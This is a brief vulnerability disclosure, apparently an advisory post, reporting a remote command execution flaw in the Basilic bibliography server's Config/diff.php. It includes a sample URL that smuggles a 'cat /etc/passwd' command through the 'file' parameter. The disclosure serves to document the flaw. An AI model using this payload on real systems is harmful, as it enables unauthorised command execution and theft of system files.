Basilic, the automated bibliography server, suffers from a remote command execution vulnerability.
755040781ca13a6b1edf74b5f503430d6657c3cd7c1127ef1310bb0e2d42433c
Hi
Dear Sir
Basilic is an Automated Bibliography Server for Research Publications Diffusion that use by many research center.
there is a RCE bug in basilic/Config/diff.php s could allow an attacker to run system command in server.
sample:
http://127.0.0.1/basilic/Config/diff.php?file=%26cat%20/etc/passwd&new=1&old=2
Regards
M.Razavi